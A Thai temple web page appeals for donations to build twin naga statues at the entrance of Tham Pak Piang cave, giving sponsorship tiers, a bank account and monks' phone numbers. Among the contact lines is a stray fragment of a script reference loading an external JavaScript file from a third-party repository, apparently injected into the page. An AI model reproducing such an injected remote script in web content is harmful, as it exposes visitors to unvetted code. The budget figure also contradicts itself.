ขอเชิญร่วมเป็นเจ้าภาพสร้างพญานาคคู่หน้าปากทางเข้าถ้ำปากเปียง

 โอบบุญ    26 พ.ค. 2555

ความเป็นมา
ในโอกาสที่หลวงพ่อเจริญ ญาณวุฒโฑ จะมีอายุครบ ๘๔ ปี พรรษา ๖๓ และท่านเป็นพระเถระชั้นผู้ใหญ่ในฝ่ายวยิปัสนากรรมฐานในเขตภาคเหนือ และหลวงพ่อเป็นพระกรรมฐานสายหลวงปู่มั่น ประจวบเหมาะกับวัดถ้ำปากเปียงเป็นวัดเก่าแก่มาแต่ครั้งพ่อแม่ครูบาอาจารย์หลวงปู่มั่น หลวงปู่แหวนปละพ่อแม่ครุบาอาจารย์สายหลวงปู่มั่นแทบทุกองค์ต้องวิเวกมาที่ถ้ำปากเปียง ดังนั้นสถานที่นี้จึงเป็นแดนมงคลเหมาะในการปฎิบัติธรรมจึงมีสาธุชนที่เคราพในการปฎิบัติธรรม และศรัทธาในหลวงพ่อเจริญ จึงคิดที่จะปรับปรุงปากทางเข้าถ้ำโดยสร้างพญานาคคู่9 เมตร
งบประมาณในการก่อสร้างนั้นอยู่ ๑๕๐,๐๐๐ (สองแสนบาทถ้วน) ถึงขอเชิญผู้ที่มีใจศรัทธาร่วมบุญกันในการสร้างพญานาคคู่หน้าทางเข้าปากถ้ำปากเปียง ในครั้งนี้เพื่อเป็นพุทธบูชา ธรรมบูชา สังฆบูชา และอาจาริยาบูชา ด้วยผลาอานิสงขอให้ผู้ใจบุญเจริญด้วย อายุ วรรณะ สุขะ พละ ธนสารสมบัติ และ นิพพานสมบัติถ้วนทั่วกัน

รายการเจ้าภาพ
๑.เจ้าภาพเมตรละ ๕,๐๐๐ จำนวน ๑๘ เมตร (สองตัว) หรือตามศรัทธา
ชื่อ.............................................................................
ชื่อ.............................................................................
๒.เจ้าภาพอิฐก้อนละ ๑บาท ใช้ ห้าพันก้อน
๓.เจ้าภาพสีทาพญานาค

สามารถโอนเงินเข้าบัญชีทำบุญตามกำลังศรัทธาได้
ธนาคารกรุงเทพ สาขา ถนนประชาอุทิศ เลขที่ 235-07-26523
ชื่อบัญชี พระนิตินัย อุดมกัน สอบถามได้ที่ พระดร.นิตินัย 089-676-2902 หรือ พระกุ๊ก 086-5222-580
 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
มีเจ้าภาพครบแล้วและขอปิดกดครงการหากสงสัยติดต่อ พระกุ๊ก 086-5222-580


• คำว่าชีวิตแปลว่าไม่ตายหรือแปลว่าเป็นอยู่ ถ้าเป็นอยู่ต้องสดชื่น เหมือนใบไม้ที่เขียวสดเพราะมันมีความสดชื่น ...

• วัดวังผาแดง ต.นาสวน อ.ศรีสวัสดิ์ จ.กาญจนบุรี

• บทสวดทำวัตรเช้า l วัดป่าบ้านตาด

• วิปัสสนา ว่าด้วยการซักซ้อมความเข้าใจ คอร์สกรรมฐานภูผาผึ้ง จ.อุบลราชธานี (9 ม.ค. 2560)

• ความเสมอภาคที่แท้ มากับความเป็นธรรม ที่สร้างสามัคคี มิใช่มีไว้เพื่อให้แก่งแย่งความเป็นธรรม

• E-BOOK...สมบัติผู้ดี ฉบับการ์ตูน

RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย